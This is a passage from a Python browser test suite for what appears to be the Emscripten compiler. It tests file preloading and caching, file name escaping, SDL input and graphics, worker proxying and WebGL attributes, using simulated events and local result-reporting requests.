self.run_browser('dirrey/page.html', 'You should see |load me right before|.', '/report_result?1')
# With FS.preloadFile
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
Module.preRun = function() {
FS.createPreloadedFile('/', 'someotherfile.txt', 'somefile.txt', true, false); // we need --use-preload-plugins for this.
};
''')
make_main('someotherfile.txt')
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--pre-js', 'pre.js', '-o', 'page.html', '--use-preload-plugins']).communicate()
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Tests that if the output files have single or double quotes in them, that it will be handled by correctly escaping the names.
def test_output_file_escaping(self):
tricky_part = '\'' if WINDOWS else '\' and \"' # On Windows, files/directories may not contain a double quote character. On non-Windowses they can, so test that.
d = 'dir with ' + tricky_part
abs_d = os.path.join(self.get_dir(), d)
try:
os.mkdir(abs_d)
except:
pass
txt = 'file with ' + tricky_part + '.txt'
abs_txt = os.path.join(abs_d, txt)
open(abs_txt, 'w').write('load me right before')
cpp = os.path.join(d, 'file with ' + tricky_part + '.cpp')
open(cpp, 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = !strcmp("|load me right before|", buf);
REPORT_RESULT();
return 0;
}
''' % (txt.replace('\'', '\\\'').replace('\"', '\\"'))))
data_file = os.path.join(abs_d, 'file with ' + tricky_part + '.data')
data_js_file = os.path.join(abs_d, 'file with ' + tricky_part + '.js')
Popen([PYTHON, FILE_PACKAGER, data_file, '--use-preload-cache', '--indexedDB-name=testdb', '--preload', abs_txt + '@' + txt, '--js-output=' + data_js_file]).communicate()
page_file = os.path.join(d, 'file with ' + tricky_part + '.html')
abs_page_file = os.path.join(self.get_dir(), page_file)
Popen([PYTHON, EMCC, cpp, '--pre-js', data_js_file, '-o', abs_page_file]).communicate()
self.run_browser(page_file, '|load me right before|.', '/report_result?0')
def test_preload_caching(self):
open(os.path.join(self.get_dir(), 'somefile.txt'), 'w').write('''load me right before running the code please''')
def make_main(path):
print path
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
extern "C" {
extern int checkPreloadResults();
}
int main(int argc, char** argv) {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = 0;
result += !strcmp("load me right before", buf);
result += checkPreloadResults();
REPORT_RESULT();
return 0;
}
''' % path))
open(os.path.join(self.get_dir(), 'test.js'), 'w').write('''
mergeInto(LibraryManager.library, {
checkPreloadResults: function() {
var cached = 0;
var packages = Object.keys(Module['preloadResults']);
packages.forEach(function(package) {
var fromCache = Module['preloadResults'][package]['fromCache'];
if (fromCache)
++ cached;
});
return cached;
}
});
''')
make_main('somefile.txt')
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--use-preload-cache', '--js-library', os.path.join(self.get_dir(), 'test.js'), '--preload-file', 'somefile.txt', '-o', 'page.html']).communicate()
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?2')
def test_preload_caching_indexeddb_name(self):
open(os.path.join(self.get_dir(), 'somefile.txt'), 'w').write('''load me right before running the code please''')
def make_main(path):
print path
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
extern "C" {
extern int checkPreloadResults();
}
int main(int argc, char** argv) {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = 0;
result += !strcmp("load me right before", buf);
result += checkPreloadResults();
REPORT_RESULT();
return 0;
}
''' % path))
open(os.path.join(self.get_dir(), 'test.js'), 'w').write('''
mergeInto(LibraryManager.library, {
checkPreloadResults: function() {
var cached = 0;
var packages = Object.keys(Module['preloadResults']);
packages.forEach(function(package) {
var fromCache = Module['preloadResults'][package]['fromCache'];
if (fromCache)
++ cached;
});
return cached;
}
});
''')
make_main('somefile.txt')
Popen([PYTHON, FILE_PACKAGER, os.path.join(self.get_dir(), 'somefile.data'), '--use-preload-cache', '--indexedDB-name=testdb', '--preload', os.path.join(self.get_dir(), 'somefile.txt'), '--js-output=' + os.path.join(self.get_dir(), 'somefile.js')]).communicate()
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--js-library', os.path.join(self.get_dir(), 'test.js'), '--pre-js', 'somefile.js', '-o', 'page.html']).communicate()
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?2')
def test_multifile(self):
# a few files inside a directory
self.clear()
os.makedirs(os.path.join(self.get_dir(), 'subdirr'));
os.makedirs(os.path.join(self.get_dir(), 'subdirr', 'moar'));
open(os.path.join(self.get_dir(), 'subdirr', 'data1.txt'), 'w').write('''1214141516171819''')
open(os.path.join(self.get_dir(), 'subdirr', 'moar', 'data2.txt'), 'w').write('''3.14159265358979''')
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
char buf[17];
FILE *f = fopen("subdirr/data1.txt", "r");
fread(buf, 1, 16, f);
buf[16] = 0;
fclose(f);
printf("|%s|\n", buf);
int result = !strcmp("1214141516171819", buf);
FILE *f2 = fopen("subdirr/moar/data2.txt", "r");
fread(buf, 1, 16, f2);
buf[16] = 0;
fclose(f2);
printf("|%s|\n", buf);
result = result && !strcmp("3.14159265358979", buf);
REPORT_RESULT();
return 0;
}
'''))
# by individual files
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--preload-file', 'subdirr/data1.txt', '--preload-file', 'subdirr/moar/data2.txt', '-o', 'page.html']).communicate()
self.run_browser('page.html', 'You should see two cool numbers', '/report_result?1')
os.remove('page.html')
# by directory, and remove files to make sure
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--preload-file', 'subdirr', '-o', 'page.html']).communicate()
shutil.rmtree(os.path.join(self.get_dir(), 'subdirr'))
self.run_browser('page.html', 'You should see two cool numbers', '/report_result?1')
def test_custom_file_package_url(self):
# a few files inside a directory
self.clear()
os.makedirs(os.path.join(self.get_dir(), 'subdirr'));
os.makedirs(os.path.join(self.get_dir(), 'cdn'));
open(os.path.join(self.get_dir(), 'subdirr', 'data1.txt'), 'w').write('''1214141516171819''')
# change the file package base dir to look in a "cdn". note that normally you would add this in your own custom html file etc., and not by
# modifying the existing shell in this manner
open(self.in_dir('shell.html'), 'w').write(open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { filePackagePrefixURL: "cdn/", '))
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
char buf[17];
FILE *f = fopen("subdirr/data1.txt", "r");
fread(buf, 1, 16, f);
buf[16] = 0;
fclose(f);
printf("|%s|\n", buf);
int result = !strcmp("1214141516171819", buf);
REPORT_RESULT();
return 0;
}
'''))
def test():
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--shell-file', 'shell.html', '--preload-file', 'subdirr/data1.txt', '-o', 'test.html']).communicate()
shutil.move('test.data', os.path.join('cdn', 'test.data'))
self.run_browser('test.html', '', '/report_result?1')
test()
def test_missing_data_throws_error(self):
def setup(assetLocalization):
self.clear()
open(self.in_dir("data.txt"), "w").write('''data''');
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
// This code should never be executed in terms of missing required dependency file.
int result = 0;
REPORT_RESULT();
return 0;
}
'''))
open(os.path.join(self.get_dir(), 'on_window_error_shell.html'), 'w').write(r'''
<html>
<center><canvas id='canvas' width='256' height='256'></canvas></center>
<hr><div id='output'></div><hr>
<script type='text/javascript'>
window.onerror = function(error) {
window.onerror = null;
var result = error.indexOf("test.data") >= 0 ? 1 : 0;
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:8888/report_result?' + result, true);
xhr.send();
setTimeout(function() { window.close() }, 1000);
}
var Module = {
filePackagePrefixURL: "''' + assetLocalization + r'''",
print: (function() {
var element = document.getElementById('output');
return function(text) { element.innerHTML += text.replace('\n', '<br>', 'g') + '<br>';};
})(),
canvas: document.getElementById('canvas')
};
</script>
{{{ SCRIPT }}}
</body>
</html>'''
)
def test():
# test test missing file should run xhr.onload with status different than 200, 304 or 206
setup("");
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html']).communicate()
shutil.move('test.data','missing.data');
self.run_browser('test.html', '', '/report_result?1')
# test unknown protocol should go through xhr.onerror
setup("unknown_protocol://");
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html']).communicate()
self.run_browser('test.html', '', '/report_result?1')
# test wrong protocol and port
setup("https://localhost:8800/");
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html']).communicate()
self.run_browser('test.html', '', '/report_result?1')
test()
# TODO: CORS, test using a full url for filePackagePrefixURL
#open(self.in_dir('shell.html'), 'w').write(open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { filePackagePrefixURL: "http:/localhost:8888/cdn/", '))
#test()
def test_sdl_swsurface(self):
self.btest('sdl_swsurface.c', expected='1')
def test_sdl_surface_lock_opts(self):
# Test Emscripten-specific extensions to optimize SDL_LockSurface and SDL_UnlockSurface.
self.btest('hello_world_sdl.cpp', reference='htmltest.png', message='You should see "hello, world!" and a colored cube.', args=['-DTEST_SDL_LOCK_OPTS'])
def test_sdl_image(self):
# load an image file, get pixel data. Also O2 coverage for --preload-file, and memory-init
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.jpg'))
open(os.path.join(self.get_dir(), 'sdl_image.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_image.c')).read()))
for mem in [0, 1]:
for dest, dirname, basename in [('screenshot.jpg', '/', 'screenshot.jpg'),
('screenshot.jpg@/assets/screenshot.jpg', '/assets', 'screenshot.jpg')]:
Popen([
PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_image.c'), '-o', 'page.html', '-O2', '--memory-init-file', str(mem),
'--preload-file', dest, '-DSCREENSHOT_DIRNAME="' + dirname + '"', '-DSCREENSHOT_BASENAME="' + basename + '"', '--use-preload-plugins'
]).communicate()
self.run_browser('page.html', '', '/report_result?600')
def test_sdl_image_jpeg(self):
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.jpeg'))
open(os.path.join(self.get_dir(), 'sdl_image_jpeg.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_image.c')).read()))
Popen([
PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_image_jpeg.c'), '-o', 'page.html',
'--preload-file', 'screenshot.jpeg', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.jpeg"', '--use-preload-plugins'
]).communicate()
self.run_browser('page.html', '', '/report_result?600')
def test_sdl_image_prepare(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.not'))
self.btest('sdl_image_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not'], also_proxied=True)
def test_sdl_image_prepare_data(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.not'))
self.btest('sdl_image_prepare_data.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not'])
def test_sdl_image_must_prepare(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.jpg'))
self.btest('sdl_image_must_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.jpg'])
def test_sdl_stb_image(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.not'))
self.btest('sdl_stb_image.c', reference='screenshot.jpg', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not'])
def test_sdl_stb_image_data(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.not'))
self.btest('sdl_stb_image_data.c', reference='screenshot.jpg', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not'])
def test_sdl_canvas(self):
self.clear()
self.btest('sdl_canvas.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION=1'])
# some extra coverage
self.clear()
self.btest('sdl_canvas.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION=1', '-O0', '-s', 'SAFE_HEAP=1'])
self.clear()
self.btest('sdl_canvas.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION=1', '-O2', '-s', 'SAFE_HEAP=1'])
def post_manual_reftest(self, reference=None):
self.reftest(path_from_root('tests', self.reference if reference is None else reference))
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function assert(x, y) { if (!x) throw 'assertion failed ' + y }
%s
var windowClose = window.close;
window.close = function() {
// wait for rafs to arrive and the screen to update before reftesting
setTimeout(function() {
doReftest();
setTimeout(windowClose, 5000);
}, 1000);
};
</script>
</body>''' % open('reftest.js').read())
open('test.html', 'w').write(html)
def test_sdl_canvas_proxy(self):
open('data.txt', 'w').write('datum')
self.btest('sdl_canvas_proxy.c', reference='sdl_canvas_proxy.png', args=['--proxy-to-worker', '--preload-file', 'data.txt'], manual_reference=True, post_build=self.post_manual_reftest)
def test_glgears_proxy(self):
self.btest('hello_world_gles_proxy.c', reference='gears.png', args=['--proxy-to-worker', '-s', 'GL_TESTING=1', '-DSTATIC_GEARS=1'], manual_reference=True, post_build=self.post_manual_reftest)
# test noProxy option applied at runtime
# run normally (duplicates above test, but verifies we can run outside of the btest harness
self.run_browser('test.html', None, ['/report_result?0'])
# run with noProxy
self.run_browser('test.html?noProxy', None, ['/report_result?0'])
original = open('test.js').read()
def copy(to, js_mod, html_mod = lambda x: x):
open(to + '.html', 'w').write(html_mod(open('test.html').read().replace('test.js', to + '.js')))
open(to + '.js', 'w').write(js_mod(open('test.js').read()))
# run with noProxy, but make main thread fail
copy('two', lambda original: re.sub(r'function _main\(\$(.+),\$(.+)\) {', r'function _main($\1,$\2) { if (ENVIRONMENT_IS_WEB) { var xhr = new XMLHttpRequest(); xhr.open("GET", "http://localhost:8888/report_result?999");xhr.send(); return; }', original),
lambda original: original.replace('function doReftest() {', 'function doReftest() { return; ')) # don't reftest on main thread, it would race
self.run_browser('two.html?noProxy', None, ['/report_result?999'])
copy('two', lambda original: re.sub(r'function _main\(\$(.+),\$(.+)\) {', r'function _main($\1,$\2) { if (ENVIRONMENT_IS_WEB) { var xhr = new XMLHttpRequest(); xhr.open("GET", "http://localhost:8888/report_result?999");xhr.send(); return; }', original))
self.run_browser('two.html', None, ['/report_result?0']) # this is still cool
# run without noProxy, so proxy, but make worker fail
copy('three', lambda original: re.sub(r'function _main\(\$(.+),\$(.+)\) {', r'function _main($\1,$\2) { if (ENVIRONMENT_IS_WORKER) { var xhr = new XMLHttpRequest(); xhr.open("GET", "http://localhost:8888/report_result?999");xhr.send(); return; }', original),
lambda original: original.replace('function doReftest() {', 'function doReftest() { return; ')) # don't reftest on main thread, it would race
self.run_browser('three.html', None, ['/report_result?999'])
copy('three', lambda original: re.sub(r'function _main\(\$(.+),\$(.+)\) {', r'function _main($\1,$\2) { if (ENVIRONMENT_IS_WORKER) { var xhr = new XMLHttpRequest(); xhr.open("GET", "http://localhost:8888/report_result?999");xhr.send(); return; }', original))
self.run_browser('three.html?noProxy', None, ['/report_result?0']) # this is still cool
def test_glgears_proxy_jstarget(self):
# test .js target with --proxy-worker; emits 2 js files, client and worker
Popen([PYTHON, EMCC, path_from_root('tests', 'hello_world_gles_proxy.c'), '-o', 'test.js', '--proxy-to-worker', '-s', 'GL_TESTING=1']).communicate()
open('test.html', 'w').write(open(path_from_root('src', 'shell_minimal.html')).read().replace('{{{ SCRIPT }}}', '<script src="test.js"></script>'))
self.post_manual_reftest('gears.png')
self.run_browser('test.html', None, '/report_result?0')
def test_sdl_canvas_alpha(self):
# N.B. On Linux with Intel integrated graphics cards, this test needs Firefox 49 or newer.
# See https://github.com/kripken/emscripten/issues/4069.
open(os.path.join(self.get_dir(), 'flag_0.js'), 'w').write('''
Module['arguments'] = ['-0'];
''')
self.btest('sdl_canvas_alpha.c', reference='sdl_canvas_alpha.png', reference_slack=12)
self.btest('sdl_canvas_alpha.c', args=['--pre-js', 'flag_0.js'], reference='sdl_canvas_alpha_flag_0.png', reference_slack=12)
def test_sdl_key(self):
for delay in [0, 1]:
for defines in [
[],
['-DTEST_EMSCRIPTEN_SDL_SETEVENTHANDLER']
]:
for emterps in [
[],
['-DTEST_SLEEP', '-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-s', 'ASSERTIONS=1', '-s', "SAFE_HEAP=1"]
]:
print delay, defines, emterps
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
function keydown(c) {
%s
//Module.print('push keydown');
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keydown", true, true, window,
0, 0, 0, 0,
c, c);
document.dispatchEvent(event);
%s
}
function keyup(c) {
%s
//Module.print('push keyup');
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keyup", true, true, window,
0, 0, 0, 0,
c, c);
document.dispatchEvent(event);
%s
}
''' % ('setTimeout(function() {' if delay else '', '}, 1);' if delay else '', 'setTimeout(function() {' if delay else '', '}, 1);' if delay else ''))
open(os.path.join(self.get_dir(), 'sdl_key.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_key.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_key.c'), '-o', 'page.html'] + defines + emterps + ['--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main']''', '-s', 'NO_EXIT_RUNTIME=1']).communicate()
self.run_browser('page.html', '', '/report_result?223092870')
def test_sdl_key_proxy(self):
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
var Module = {};
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
''')
def post():
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function keydown(c) {
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keydown", true, true, window,
0, 0, 0, 0,
c, c);
document.dispatchEvent(event);
}
function keyup(c) {
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keyup", true, true, window,
0, 0, 0, 0,
c, c);
document.dispatchEvent(event);
}
keydown(1250);keydown(38);keyup(38);keyup(1250); // alt, up
keydown(1248);keydown(1249);keydown(40);keyup(40);keyup(1249);keyup(1248); // ctrl, shift, down
keydown(37);keyup(37); // left
keydown(39);keyup(39); // right
keydown(65);keyup(65); // a
keydown(66);keyup(66); // b
keydown(100);keyup(100); // trigger the end
</script>
</body>''')
open('test.html', 'w').write(html)
self.btest('sdl_key_proxy.c', '223092870', args=['--proxy-to-worker', '--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main', '_one']''', '-s', 'NO_EXIT_RUNTIME=1'], manual_reference=True, post_build=post)
def test_keydown_preventdefault_proxy(self):
def post():
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function keydown(c) {
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keydown", true, true, window,
0, 0, 0, 0,
c, c);
return document.dispatchEvent(event);
}
function keypress(c) {
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keypress", true, true, window,
0, 0, 0, 0,
c, c);
return document.dispatchEvent(event);
}
function keyup(c) {
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keyup", true, true, window,
0, 0, 0, 0,
c, c);
return document.dispatchEvent(event);
}
function sendKey(c) {
// Simulate the sending of the keypress event when the
// prior keydown event is not prevent defaulted.
if (keydown(c) === false) {
console.log('keydown prevent defaulted, NOT sending keypress!!!');
} else {
keypress(c);
}
keyup(c);
}
// Send 'a'. Simulate the sending of the keypress event when the
// prior keydown event is not prevent defaulted.
sendKey(65);
// Send backspace. Keypress should not be sent over as default handling of
// the Keydown event should be prevented.
sendKey(8);
keydown(100);keyup(100); // trigger the end
</script>
</body>''')
open('test.html', 'w').write(html)
self.btest('keydown_preventdefault_proxy.cpp', '300', args=['--proxy-to-worker', '-s', '''EXPORTED_FUNCTIONS=['_main']''', '-s', 'NO_EXIT_RUNTIME=1'], manual_reference=True, post_build=post)
def test_sdl_text(self):
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function simulateKeyEvent(charCode) {
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keypress", true, true, window,
0, 0, 0, 0, 0, charCode);
document.body.dispatchEvent(event);
}
''')
open(os.path.join(self.get_dir(), 'sdl_text.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_text.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_text.c'), '-o', 'page.html', '--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main', '_one']''']).communicate()
self.run_browser('page.html', '', '/report_result?1')
def test_sdl_mouse(self):
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
open(os.path.join(self.get_dir(), 'sdl_mouse.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_mouse.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_mouse.c'), '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js']).communicate()
self.run_browser('page.html', '', '/report_result?1')
def test_sdl_mouse_offsets(self):
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, x, y, x, y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
open(os.path.join(self.get_dir(), 'page.html'), 'w').write('''
<html>
<head>
<style type="text/css">
html, body { margin: 0; padding: 0; }
#container {
position: absolute;
left: 5px; right: 0;
top: 5px; bottom: 0;
}
#canvas {
position: absolute;
left: 0; width: 600px;
top: 0; height: 450px;
}
textarea {
margin-top: 500px;
margin-left: 5px;
width: 600px;
}
</style>
</head>
<body>
<div id="container">
<canvas id="canvas"></canvas>
</div>
<textarea id="output" rows="8"></textarea>
<script type="text/javascript">
var Module = {
canvas: document.getElementById('canvas'),
print: (function() {
var element = document.getElementById('output');
element.value = ''; // clear browser cache
return function(text) {
if (arguments.length > 1) text = Array.prototype.slice.call(arguments).join(' ');
element.value += text + "\\n";
element.scrollTop = element.scrollHeight; // focus on bottom
};
})()
};
</script>
<script type="text/javascript" src="sdl_mouse.js"></script>
</body>
</html>
''')
open(os.path.join(self.get_dir(), 'sdl_mouse.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_mouse.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_mouse.c'), '-DTEST_SDL_MOUSE_OFFSETS', '-O2', '--minify', '0', '-o', 'sdl_mouse.js', '--pre-js', 'pre.js']).communicate()
self.run_browser('page.html', '', '/report_result?1')
def test_glut_touchevents(self):
self.btest('glut_touchevents.c', '1')
def test_glut_wheelevents(self):
self.btest('glut_wheelevents.c', '1')
def test_sdl_joystick_1(self):
# Generates events corresponding to the Working Draft of the HTML5 Gamepad API.
# http://www.w3.org/TR/2012/WD-gamepad-20120529/#gamepad-interface
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
gamepads.push({
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
});
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = 0;
};
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button] = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button] = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
open(os.path.join(self.get_dir(), 'sdl_joystick.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_joystick.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_joystick.c'), '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js']).communicate()
self.run_browser('page.html', '', '/report_result?2')
def test_sdl_joystick_2(self):
# Generates events corresponding to the Editor's Draft of the HTML5 Gamepad API.
# https://dvcs.w3.org/hg/gamepad/raw-file/default/gamepad.html#idl-def-Gamepad
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
gamepads.push({
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
});
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
// Buttons are objects
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = { pressed: false, value: 0 };
};
// FF mutates the original objects.
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button].pressed = true;
gamepads[index].buttons[button].value = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button].pressed = false;
gamepads[index].buttons[button].value = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
open(os.path.join(self.get_dir(), 'sdl_joystick.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_joystick.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_joystick.c'), '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js']).communicate()
self.run_browser('page.html', '', '/report_result?2')
def test_webgl_context_attributes(self):
# Javascript code to check the attributes support we want to test in the WebGL implementation
# (request the attribute, create a context and check its value afterwards in the context attributes).
# Tests will succeed when an attribute is not supported.
open(os.path.join(self.get_dir(), 'check_webgl_attributes_support.js'), 'w').write('''
mergeInto(LibraryManager.library, {
webglAntialiasSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {antialias: true});
attributes = context.getContextAttributes();
return attributes.antialias;
},
webglDepthSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {depth: true});
attributes = context.getContextAttributes();
return attributes.depth;
},
webglStencilSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {stencil: true});
attributes = context.getContextAttributes();
return attributes.stencil;
},
webglAlphaSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {alpha: true});
attributes = context.getContextAttributes();
return attributes.alpha;
}
});
''')
# Copy common code file to temporary directory
filepath = path_from_root('tests/test_webgl_context_attributes_common.c')
temp_filepath = os.path.join(self.get_dir(), os.path.basename(filepath))
shutil.copyfile(filepath, temp_filepath)
# perform tests with attributes activated
